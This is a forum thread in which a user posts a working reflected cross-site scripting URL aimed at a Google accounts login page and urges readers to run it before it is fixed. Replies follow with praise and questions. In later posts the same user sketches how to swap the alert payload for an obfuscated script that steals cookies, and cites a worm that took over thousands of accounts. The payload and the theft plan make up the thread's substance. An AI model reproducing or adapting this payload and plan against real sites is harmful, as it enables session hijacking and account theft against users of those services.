i hacked GOOGLE!

indiansword's Avatar, Join Date: Oct 2008
Security Expert
I gave this title just to get more views to it, i have found another XSS vulnerability in google login pages. Have a look at it before it gets fixed, i have pasted the code below, which you will need to run into your address bar and have fun!

Code:
https://www.google.com/accounts/ServiceLoginAuth?service=jotspot&continue=http%3A%2F%2Fsites.google.com%2F%3Fhl%3Dfr&service=jotspot&ul=1&ul=1&sulf=1&UniversalLoginEmail=%22%27%2F%3E%3Cscript%3Ealert(%27Xssed%20by%20Indian%20Sword%27)%3C%2Fscript%3E&uls=Valider
P.S.:- I've already reported it to google, so it'd be fixed soon.
0
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
What will happen when we paste the above code.
0
indiansword's Avatar, Join Date: Oct 2008
Security Expert
lol, r u dbouting me?

i aint gonna steal nothing, if u still dbout then clear your cookies and then check

it will create another MANUAL box in GMAILS main page, as u see it is NOT some PHISHING SH81, because the address starts with "google.com"
0
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
No. Just wanted to know the output. I know its Google.com domain l0l
0
SpOonWiZaRd's Avatar, Join Date: May 2007
Know what you can do.
DUDE!! You are the fu**ing master! how did you come about this? great stuff...
0
indiansword's Avatar, Join Date: Oct 2008
Security Expert
glad atleast someone liked it :P
0
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
Quote:
Originally Posted by indiansword View Post
glad atleast someone liked it :P
Even I liked it but I wanted to even know what would be the output as well. Some repu your way
0
indiansword's Avatar, Join Date: Oct 2008
Security Expert
Quote:
Originally Posted by shabbir View Post
Even I liked it but I wanted to even know what would be the output as well. Some repu your way
You're talking about OUTPUT!?

Right now i made another box below the login box just to make you guyz udnerstand. Now, i can just remove that box and make the gmail the way it usually looks, and at the end i can add a script to steal the cookies and that particular script i can use "charcode[]" and hex the script so no one would understand it.

If you remember the XSS worm in orkut albums, ONLY orkut worm stole more than 45,000 ids just in about 5 hours. And this thing is ENTIRE GOOGLE including adsense,orkut,gmail etc. etc.

yea 1 more thing,
this vBulletin reputation system SUCKS!

Last edited by indiansword; 23Apr2009 at 00:10..
0
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
Agreed that Google Accounts could be in trouble but I guess they should have fixed it by now but I still see its not.
0
SpOonWiZaRd's Avatar, Join Date: May 2007
Know what you can do.
I see that indiansword likes XSS alot....